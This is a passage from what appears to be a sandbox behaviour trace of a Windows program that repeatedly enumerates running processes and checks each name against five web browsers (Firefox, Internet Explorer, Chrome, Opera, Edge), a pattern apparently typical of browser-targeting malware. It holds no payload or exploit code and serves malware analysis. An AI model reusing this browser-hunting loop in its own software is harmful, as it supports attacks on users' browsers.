cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.584] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0173.584] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0173.584] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0173.584] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0173.584] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.584] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0173.585] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0173.585] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0173.585] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0173.585] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0173.585] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.585] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.585] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0173.585] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0173.585] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0173.585] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0173.585] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.585] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0173.586] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0173.586] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0173.586] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0173.586] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0173.586] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.586] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0173.586] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0173.586] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0173.586] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0173.586] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0173.586] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.586] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0173.587] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0173.587] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0173.587] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0173.587] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0173.587] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.587] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0173.588] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0173.588] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0173.588] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0173.588] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0173.588] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.588] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0173.588] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0173.588] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0173.588] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0173.588] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0173.588] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.588] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0173.589] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0173.589] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0173.589] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0173.589] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0173.589] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.589] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0173.589] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0173.589] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0173.589] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0173.589] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0173.589] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.589] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x790, pcPriClassBase=6, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 1 [0173.637] lstrcmpiA (lpString1="regsvr32.exe", lpString2="firefox.exe") returned 1 [0173.637] lstrcmpiA (lpString1="regsvr32.exe", lpString2="iexplore.exe") returned 1 [0173.637] lstrcmpiA (lpString1="regsvr32.exe", lpString2="chrome.exe") returned 1 [0173.637] lstrcmpiA (lpString1="regsvr32.exe", lpString2="opera.exe") returned 1 [0173.637] lstrcmpiA (lpString1="regsvr32.exe", lpString2="microsoftedgecp.exe") returned 1 [0173.637] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0173.638] CloseHandle (hObject=0xe8) returned 1 [0173.638] Sleep (dwMilliseconds=0x3e8) [0174.777] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0174.779] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0174.779] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0174.779] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0174.779] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0174.779] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0174.779] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0174.779] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0174.780] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0174.780] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0174.780] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0174.780] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0174.780] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0174.780] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0174.780] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0174.780] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0174.780] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0174.780] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0174.780] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.780] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0174.781] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0174.781] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0174.781] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0174.781] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0174.781] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.781] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0174.782] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0174.782] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0174.782] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0174.782] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0174.782] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.782] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0174.782] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0174.782] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0174.782] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0174.782] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0174.782] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.782] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0174.783] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0174.783] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0174.783] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0174.783] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0174.783] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.783] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0174.783] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0174.783] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0174.783] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0174.783] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0174.783] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.783] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0174.784] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0174.784] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0174.784] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0174.784] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0174.784] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.784] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0174.785] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0174.785] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0174.785] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0174.785] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0174.785] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.785] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.785] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0174.785] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0174.785] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0174.785] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0174.785] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.785] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.786] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0174.786] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0174.786] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0174.786] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0174.786] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.786] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.786] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0174.786] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0174.786] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0174.786] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0174.786] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.786] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.787] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0174.787] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0174.787] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0174.787] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0174.787] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.787] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.787] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0174.787] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0174.788] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0174.788] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0174.788] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.788] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0174.788] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0174.788] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0174.788] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0174.788] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0174.788] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.788] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.789] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0174.789] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0174.789] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0174.789] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0174.789] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.789] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.789] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0174.789] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0174.789] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0174.789] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0174.789] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.789] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0174.790] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0174.790] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0174.790] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0174.790] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0174.790] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.790] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0174.790] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0174.790] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0174.790] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0174.791] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0174.791] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.791] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0174.791] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0174.791] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0174.791] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0174.791] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0174.791] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.791] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0174.792] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0174.792] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0174.792] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0174.792] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0174.792] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.792] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0174.792] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0174.792] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0174.792] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0174.792] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0174.792] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.792] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0174.793] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0174.793] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0174.793] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0174.793] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0174.793] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.793] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0174.793] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0174.793] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0174.793] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0174.794] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0174.794] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.794] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0174.794] lstrcmpiA (lpString1="receptor paintings.exe", 